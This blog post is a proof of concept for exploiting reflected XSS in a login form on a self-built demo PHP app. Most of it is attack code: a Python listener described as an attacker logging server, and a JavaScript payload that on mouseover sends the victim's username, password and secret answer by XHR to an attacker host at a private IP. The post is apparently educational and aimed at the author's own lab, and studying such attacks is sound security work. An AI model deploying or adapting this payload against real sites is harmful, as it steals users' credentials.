Friday 15 May 2020

POC - Exploiting XSS in a Login Form.


This a simple POC to demonstrate exploitation of XSS on a login form.

Note: This is posted here from my old blog https://jovyn.github.io/ExploitingXSSinLoginForm/


To demonstrate this attack, I have written an App (not really an app, jus a couple of PHP pages) called Bazingaa that expects a user to enter their username, password and a Secret Answer. On entering any wrong values the Page responds with an Auth error and reflects the Secret Answer back in the Error page. This answer field is vunerable to Reflected XSS.

The Bazingaa App is dowloadable Here

The Listener ..

For this demo I used Python’s SimpleHTTPServer to listen for incoming requests (XHR sent by our malicious script).

Below is the code for the Server:

#SimpleHTTP server listening on port 8000 for incoming GET Requests
import SimpleHTTPServer
import SocketServer
PORT = 8000
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", PORT), Handler)
print "Attacker Logging server listening on Port:", PORT
httpd.serve_forever()
he JS exploit

The Javascript exploit I wrote simply sends an XHR request to an attacker’s server - where the attacker logs all the incoming GET requests. The malicious Javascript appends the victim’s username, password and Secret answer to the XHR GET request when the Victim hovers his/her mouse over the Login Button.

Here is the Javascript exploit:

(function(){
var usr = document.forms[0].elements[0].value;
var pass = document.forms[0].elements[1].value;
var sectxt = document.forms[0].elements[2].value;
var button = document.getElementById("idlogin");   // form id of Bazinga login form.
button.onmouseover = function(){
	//alert(document.forms[0].elements[0].value);   // Ignore these alerts, They were here jus for debugging 
	//alert(document.forms[0].elements[1].value);   // I could have deleted them rather than typing all this
	//alert(document.forms[0].elements[2].value);   //  But hey .. I am stupid :P 
	xobj = new XMLHttpRequest();
	xobj.open("GET", "http://192.168.220.140:8000?data-"+"uname="+document.forms[0].elements[0].value +":"+"Pass="+document.forms[0].elements[1].value+":"+"Secret="+document.forms[0].elements[2].value, true);
	xobj.send();}
	})();

Below is a video of the above described attack:
at No comments:
Subscribe to: Posts (Atom)

Notes - > Git Basics , git commands

[These are my git notes related to git commands] Ref:  Git Tutorials - by Corey Schafer. ---------------------------------------------------...